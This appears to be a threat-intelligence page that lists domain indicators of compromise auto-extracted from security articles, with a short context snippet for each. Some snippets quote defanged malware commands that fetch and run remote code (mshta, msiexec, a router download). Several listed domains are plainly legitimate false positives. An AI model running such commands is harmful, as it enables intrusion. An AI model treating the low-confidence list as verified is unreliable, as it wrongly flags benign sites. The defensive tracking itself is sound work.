ZeroHour

Indicators of compromise

1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainsteelseries-cn.com.cnapture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method CaliCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 15d ago
domaintranslate-youdao.hl.cnPDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 15d ago
domainwww.gehie246.comns. pc-razerzone[.]com[.]cn (spoofed Razer download site) → www[.]gehie246[.]com/712down → app_setup.6653004.zip → stage-one loader A deCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 15d ago
domainyimxg25tiy.comnation page that served it and to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins71Counterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 15d ago
domainzh-diskgenius.com.cnictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn CCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 15d ago
domainaguamammillaria.cfdh4htc0h0ggdh.canadacentral-01.azurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain:Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 15d ago
domainaguasedum.cfdurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 15d ago
domainazurewebsites.nete text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcut: SGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 15d ago
domaincolombstracciatella.cfdr: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: Assine coGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 15d ago
domainpinggy.linkm[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggy[.]link:21601/ Note: I saw HTTPS traffic to WhatsApp and GitHub dGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 15d ago
domaincentrodigestionedellarapina.lifeate. Indicators of compromise (IOCs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address useFake GTA 6 leaked copy drains your crypto wallet
Malwarebytes Labs
· 16d ago
domaindasunerforschtelandamendederwelt.sbs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address used by the page’s inline transfer 21iWU6FFake GTA 6 leaked copy drains your crypto wallet
Malwarebytes Labs
· 16d ago
domainip.me’t belong to the face on the video call. “The user accessed ip[.]me directly to determine their public-facing IP address justNorth Korea-linked IT Workers Are Getting Hired Inside Western Companies
Security Affairs
· 16d ago
domainclaude.aiso: How attackers hosted a fake Claude download page on the claude.ai domain Subscribe to our breaking news e-mail alert to neverAnthropic locks out Claude users after infostealers hijack login sessions
Help Net Security
· 17d ago
domainhunt.iooud and WordPress systems. The activity was uncovered after Hunt.io found an exposed server in Amsterdam that contained attackPhilippine Nuclear and Naval Targets Hit by Suspected Chinese Operator
Security Affairs
· 19d ago
domaindocopened.jpghxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. This serves as a document-open “canary,” alerting BlueDeRussian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 20d ago
domainwebhook.siteins a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. ThiRussian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 20d ago
domainajax.nettructure Security Agency (CISA) adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flU.S. CISA adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· 20d ago
domaingetpdfdigital.clouder to a shortened URL that resolves through a redirector to getpdfdigital[.]cloud, a known attacker site used to stage malicious payloads.Dark Caracal Deploys New Go Malware With Ethereum-Based C2 Fallback
Security Affairs
· 20d ago
domainajax.net-2015-5287), a Microsoft SQL Server bug (CVE-2019-1068), an Ajax.NET deserialization flaw (CVE-2021-23758), and a Linux Kernel vPreviously patched Citrix NetScaler flaw exploited in the wild (CVE-2026-8452)
Help Net Security
· 21d ago
domainnova-client.come official websites, only GitHub pages and Discord servers. Nova-client.com is a fake website for a client that has no real website; thFake Minecraft Sites Are Still Spreading WeedHack After C2 Takedown
Security Affairs
· 23d ago
domaintrycloudflare.comhenticated session. In the demo, the fake login page used a trycloudflare.com subdomain, giving the link a valid TLS certificate and a moiAuthFlow v2: The $10,000 Phishing Toolkit That Survives Your Password Reset
Security Affairs
· 24d ago
domaincardoor.cnnstructions from a message broker hosted on a domain called cardoor[.]cn, which tells it which app files to download and install.Android car head units infected with proxy botnet malware through built-in software updaters
Help Net Security
· 24d ago
domainclasstandscrest.comewhere for suspected fraud. The public registration page at classtandscrest[.]com (Source: Allure Security) What to check Researchers recomA $25 template helped scammers build hundreds of phantom bank domains
Help Net Security
· 27d ago
domainremedycodes.siten form was set to send submitted data to a separate domain, remedycodes[.]site. Researchers did not submit the form. That same Remedy adA $25 template helped scammers build hundreds of phantom bank domains
Help Net Security
· 27d ago
domaindtm.kijangturbo88.topthat communicated with Telegram-based infrastructure, using dtm[.]kijangturbo88[.]top as its command-and-control endpoint. “While the malwareFake Gemini installer delivers Vidar infostealer via Google Colab lure
Help Net Security
· 28d ago
domainfd6fq54s6df541q23sdxfg.eummand is used to download a binary called nvr from http://y.fd6fq54s6df541q23sdxfg[.]eu/nvr 1 2 3 4 / bin / sh - c nvram set rc_firewall = "sleepMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
domainmods.net.156[.]190/.y/pty5 hxxp://159.89.156[.]190/.y/pty6 s.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f033055Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
domaineleethub.coms from Eleethub The domain associated with the C2 server is eleethub[.]com . We visited the website and found a message announcing tEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
domainlos.zetas.mx, and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican crEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
domaindownloads.openwrt.orgin OpenWrt allowed attackers to impersonate downloads from downloads.openwrt.org and make the devices download malicious updates. This meansRisks in IoT Supply Chain
Palo Alto Unit 42
· 29d ago
domainiotlmao.xyz5889c244501288b9fa7c7dc7f1e8c5ef1291 Feb 26, 2021 13:14 UTC iotlmao[.]xyz/bins/dark.m68k a6cb6356432ca83467f6da2168be2aabbabe5d2f2dNew Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
domainvietdediserver.shop. This IP address is also associated with the domain ​​ cnc.vietdediserver[.]shop , which is a known, malicious domain associated with MiraA Deep Dive Into Attempted Exploitation of CVE-2023
Palo Alto Unit 42
· 29d ago
domaindigikalas.onlinebdirectory leaks the workstation hostname newtuxdev.sevielw.digikalas[.]online Aug. 6, 2025 Developer domain digikalas[.]online registerTuxBot v3: Inside an IoT Botnet Framework With LLM
Palo Alto Unit 42
· 29d ago
domainbynar.ioditing researcher Alfredo Pesoli (@__rev) at Bynario Atlas (bynar.io) for the discovery. “An attacker on the network may be ableU.S. CISA adds Apple macOS, Microsoft SharePoint, Broadcom VMware vCenter, and Microsoft IKE flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· 29d ago
domaintenire.comChaos agent binary from an attacker-controlled server ("pan.tenire[.]com"), set permissions to allow all users to read, modify, orNew Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy
The Hacker News
· Aug 18, 2026
domainpayloads.inands, performing reconnaissance, and deploying second-stage payloads.In this blog post, ThreatLabz provides a technical analysis ofC2Looper: A New Backdoor Likely Tied To Ransomware With GitHub C2
Zscaler ThreatLabz
· Aug 17, 2026
domainfeed43.com85.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734622Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
domainrapidfeeds.coman be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encounPatchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
domainwebrss.com850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]comPatchwork Continues to Deliver BADNEWS to the Indian Subcontinent
Palo Alto Unit 42
· Aug 17, 2026
domainfacebook-apps.comt mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associatedRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
domainjdanief.xyzject ( "WScript.Shell" ) . Run "msiexec /q /i http:\\dlj40s.jdanief[.]xyz/images/word3.doc" , 0 > % userProfile % \ AppData \ LocalRANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families
Palo Alto Unit 42
· Aug 17, 2026
domainbookreader.bituse them. This new sample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS ServeUpatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
domaindoghunter.bitample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers: 31.3.135[.]232 1Upatre Continued to Evolve with new Anti
Palo Alto Unit 42
· Aug 17, 2026
domainalmasoodgroup.comry 2019, an engineering and hydraulics company in Pakistan, almasoodgroup[.]com was observed hosting two AtraDownloader executables as weMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainaroundtheworld123.netnhexlify("6E7F7C827B71817572847C7F79713E3F403B7B7281"))) >> aroundtheworld123[.]net The malware proceeds to check to determine if the AVG secMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaincom.pkich had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.]coMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaincyberthreatalliance.orgs. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org. Appendix ArtraDownloader Malware Analysis – Variant 1 ForMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainframeworksupport.netxFF) return out >> print(decode(“iudphzrunvxssruw1qhw”)) >> frameworksupport[.]net It proceeds to attempt to create the C:\intel\ directory,Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaingov.pkember 17 and 18 2018, a file was downloaded from http://fst.gov[.]pk/images/winsvc (SHA256: ef0cb0a1…) after a user accessed tMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainkhurram.combles, which had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainkielsoservice.netmmunicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolitan Model United Nations, is aMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainnethosttalk.comn Saudi Arabia. The malicious file communicated with the C2 nethosttalk[.]com. Around the same timeframe, two additional files (listedMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainnsiagenthoster.netom/js/cwqj and communicated with C2 domain thepandaservices.nsiagenthoster[.]net. The domain almasoodgroup[.]com appears to be a legitimatMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainorg.pkop.pdf[.]com Beginning on Nov 6, 2018, the URL http://rmmun.org[.]pk/svch was observed hosting two ArtraDownloader files thatMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainpdf.comthe domain nethosttalk[.]com for C2. Handling of Logistics.pdf[.]com Cyber security work shop.pdf[.]com Beginning on Nov 6, 20Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainviewworld71.comtraDownloader files that communicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots MetropolitMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainwforc.pked files with the following names hosted on the URL https://wforc[.]pk/js/. Internet Data Traffic Report – August 2018.docx PAFMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainxiovo426.netmpany’s domain communicated with command and control domain xiovo426[.]net. On 2 Jan 19, the file article_amy.doc was also uploadedMultiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domainzmwardrobe.comon malicious documents that were downloaded from the domain zmwardrobe[.]com and subsequently executed a payload referred to as MY24.Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan
Palo Alto Unit 42
· Aug 17, 2026
domaineseses.tkri[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainturkiyeburslari.gov.trirrors the legitimate Turkish Scholarship government domain turkiyeburslari[.]gov[.]tr, also resolved to this IP and may likely have been usedNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainturkiyeburslari.tkly associated with Chafer activity. Of interest, the domain turkiyeburslari[.]tk, which mirrors the legitimate Turkish Scholarship governmNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainwin10-update.comrted earlier in 2018 by Clearsky , specifically, the domain win10-update[.]com. While we lack visibility into the initial delivery mechaNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainwin7-update.comreport win10-update[.]com 185.177.59[.]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com)New Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainxn--mgbfv9eh74d.com]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainytb.servicesm turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tkNew Python-Based Payload MechaFlounder Used by Chafer
Palo Alto Unit 42
· Aug 17, 2026
domainbitly.comthe following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta” aAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainblogspot.comalysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTP rAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainduckdns.orgult in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2. During our research, we found several relaAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainpastebin.comding of a portable executable hosted on Pastebin at https://pastebin[.]com/raw/2LDaeHE1 , decoding the base64 downloaded from the URAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainvb.netrom pastebin[.]com/raw/2LDaeHE1 This payload was written in VB.NET and named "Nuclear Explosion," which is a variant of RevengAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domainwixstatic.comattempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : FigureAggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign
Palo Alto Unit 42
· Aug 17, 2026
domain6google.com2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainalforatsystem.com/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domaincheck-updates.com- 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27/18 Masked check-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com travelexHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainfirewallsupports.comlation to pasta58[.]com : Domain Date Registered Registrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmail.contoso.coming, we were able to enable the C2 channel: hisoka;pass123!;mail.contoso.com;2010 To initiate communications, Hisoka notifies the actorxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosoft-check.com18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainmicrosofte-update.comven Hisoka v0.8 samples configured to beacon to the domains microsofte-update[.]com . Each of these samples also contain the following debugxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainpasta58.coma samples -- all of which were configured to use the domain pasta58[.]com for its C2 server. During general infrastructure analysisxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainsakabota.comdomain registration details, we also identified the domain sakabota[.]com whose web server served a page with the title “Outlook WexHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domaintraveleasy-kw.comtes[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com traveleasy-kw[.]com 6/13/18 - 6/13/19 Masked Table 1. Domains associated withxHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwindows64x.com7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 -xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwindows-updates.com- 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 -xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainwinx64-microsoft.comegistrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations
Palo Alto Unit 42
· Aug 17, 2026
domainfirewallsupports.comhat communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have telemetry to determine thexHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainindows64x.comobserved one of these overlapping domains, specifically, w indows64x[.]com , being used as the C2 server for a new PowerShell basedxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainpasta58.comunt campaign , we observed several domains with ties to the pasta58[.]com domain associated with known Sakabota command and controlxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwindows64x.comer 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHYxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwindows-updates.comHY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not havexHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwinx64-microsoft.comts seen installing CASHY200, which shows another C2 domain, winx64-microsoft[.]com , used by this threat group. Modified time SHA256 FilenamxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainclementeolmos.comthis blog. Date Observed C2 Trickbot Payload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf1TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainlindaspryinteriordesign.com7a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a847096TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainmaisonmarielouise.orgb093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c 11/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d91340465TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domainsavute.innloader C2 Trickbot Payload File SHA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eebTrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks
Palo Alto Unit 42
· Aug 17, 2026
domain6google.comupdate[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]com) 104.168.136[.]161 6/24/2019 Newly identified DNS redirecxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainalforatsystem.comactivity 213.202.217[.]0,22 6/1/2018, 12/24/2018 Sakabota (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]coxHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domainantivirus-update.toped DNS redirect activity 192.99.138[.]4 4/24/2019 Sakabota (antivirus-update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026
domaincloudipnameserver.comd DNS Hijacking Activity 185.15.247[.]140 1/14/2017 Oilrig (cloudipnameserver[.]com) 185.15.247[.]140 9/9/2018 Sakabota (sakabota[.]com) 185.xHunt Campaign: New Watering Hole Identified for Credential Harvesting
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.